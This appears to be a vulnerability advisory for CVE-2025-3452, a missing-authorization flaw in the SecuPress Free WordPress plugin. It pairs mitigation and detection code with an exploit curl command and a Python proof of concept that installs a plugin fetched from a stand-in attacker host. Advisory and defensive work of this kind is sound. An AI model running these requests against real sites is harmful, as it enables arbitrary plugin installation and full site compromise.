SecuPress Free (WordPress), Missing Authorization Vulnerability, CVE-2025-3452 (Critical)

How CVE-2025-3452 Works

The vulnerability exists in the `secupress_reinstall_plugins_admin_ajax_cb` function of the SecuPress Free WordPress security plugin (versions ≤ 2.3.9). Due to a missing capability check, authenticated attackers with Subscriber-level permissions can exploit this flaw via a crafted AJAX request. This allows unauthorized plugin installations, potentially leading to remote code execution (RCE), privilege escalation, or malware deployment. The lack of CSRF protection further increases the risk, enabling attackers to chain exploits.

DailyCVE Form

Platform: WordPress
Version: ≤ 2.3.9
Vulnerability: Missing Authorization
Severity: Critical
Date: 05/06/2025

What Undercode Says:

Analytics:

  • Attack Vector: AJAX (admin-ajax.php)
  • Privilege Escalation: Subscriber → Admin
  • CVSS 4.0: 9.6 (Critical)
  • Exploitability: Low complexity, no user interaction

Exploit Command (cURL):

curl -X POST 'http://target.com/wp-admin/admin-ajax.php' \
--data 'action=secupress_reinstall_plugins_admin_ajax_cb&plugin=malicious.zip'

PoC (Python):

import requests
target = "http://target.com/wp-admin/admin-ajax.php"
data = {"action": "secupress_reinstall_plugins_admin_ajax_cb", "plugin": "http://attacker.com/malicious.zip"}
requests.post(target, data=data, cookies={"wordpress_logged_in": "1"})

Mitigation:

1. Patch: Upgrade to SecuPress Free ≥ 2.4.0.

2. WAF Rule: Block unauthorized `admin-ajax.php` requests to `secupress_` actions.

3. WordPress Hardening (add to a must-use plugin or the theme's functions.php; priority 0 makes it run before the plugin's own callback, which is registered at the default priority 10):

add_action('wp_ajax_secupress_reinstall_plugins_admin_ajax_cb', function () {
    // Refuse the AJAX action unless the user is allowed to install plugins.
    if (!current_user_can('install_plugins')) {
        wp_die('Unauthorized', 'Unauthorized', array('response' => 403));
    }
}, 0);
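A broader form of the capability gate in step 3, written here as an added example (it is not SecuPress's code and not from the original post): a must-use plugin that hooks `admin_init`, which admin-ajax.php fires before it dispatches any `wp_ajax_*` action, and rejects every `secupress_`-prefixed AJAX action from users lacking `install_plugins`. It is the prefix rule from step 2 enforced inside WordPress itself, so it also covers SecuPress actions this page does not name. The prefix, the capability, and the file location are assumptions.

```php
<?php
/**
 * Plugin Name: Gate secupress_* AJAX actions (added example, not SecuPress code)
 * Place this file in wp-content/mu-plugins/ so it loads before regular plugins.
 */

// Prefix assumed from the AJAX action shown in the write-up; adjust if needed.
const SECUPRESS_GATE_PREFIX = 'secupress_';

function secupress_gate_ajax_actions() {
    // Only act on admin-ajax.php requests that carry an action parameter.
    if ( ! wp_doing_ajax() || empty( $_REQUEST['action'] ) ) {
        return;
    }
    $action = sanitize_key( wp_unslash( $_REQUEST['action'] ) );
    if ( strpos( $action, SECUPRESS_GATE_PREFIX ) !== 0 ) {
        return; // Not a SecuPress action; leave it to its own handler.
    }
    // Plugin (re)installation is an administrator task: require the capability.
    if ( ! current_user_can( 'install_plugins' ) ) {
        // Log the attempt so blocked requests show up in the PHP error log.
        error_log( sprintf(
            'Blocked AJAX action "%s" for user %d from %s',
            $action,
            get_current_user_id(),
            isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown'
        ) );
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 ); // exits
    }
}
// admin_init runs in admin-ajax.php before do_action( "wp_ajax_{$action}" ).
add_action( 'admin_init', 'secupress_gate_ajax_actions' );
```

Because `wp_send_json_error()` exits, the plugin's callback never runs for a blocked request. The gate does not add a nonce check, since the nonce name SecuPress uses for its own admin requests is not stated on this page; pair it with the vendor update, which is the real fix.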

Detection (Bash):

# Locates the plugin source containing the vulnerable callback. This confirms the
# plugin is present in the web root, not that the flaw was exploited.
grep -r "secupress_reinstall_plugins_admin_ajax_cb" /var/www/html/
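A version-aware companion to the grep above, added here as an example (not the page's or the project's own code): run through WP-CLI with `wp eval-file`, it reads the installed SecuPress plugin header and reports whether the version is at or below 2.3.9, the range this page lists as affected. The main plugin file path `secupress/secupress.php` is an assumption; confirm it with `wp plugin list`.

```php
<?php
// Run from the WordPress root: wp eval-file check-secupress.php
// Assumed main plugin file for SecuPress Free (verify with: wp plugin list).
$plugin_file = 'secupress/secupress.php';
$path        = WP_PLUGIN_DIR . '/' . $plugin_file;

if ( ! file_exists( $path ) ) {
    echo "SecuPress not installed.\n";
    return;
}

// get_plugin_data() and is_plugin_active() live in the admin includes.
require_once ABSPATH . 'wp-admin/includes/plugin.php';

$data    = get_plugin_data( $path, false, false );
$version = $data['Version'];
$state   = is_plugin_active( $plugin_file ) ? 'active' : 'inactive';

// Affected range and fixed version as stated in the write-up.
if ( version_compare( $version, '2.3.9', '<=' ) ) {
    echo "VULNERABLE: SecuPress {$version} ({$state}) is <= 2.3.9; update to 2.4.0 or later.\n";
} else {
    echo "OK: SecuPress {$version} ({$state}) is above 2.3.9.\n";
}
```

An inactive copy still matters for inventory, but only an active plugin registers the AJAX handler, so the `active`/`inactive` flag tells you whether the site is exposed right now.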

Impact: Full site compromise via arbitrary plugin installation.

Sources:

Reported By: nvd.nist.gov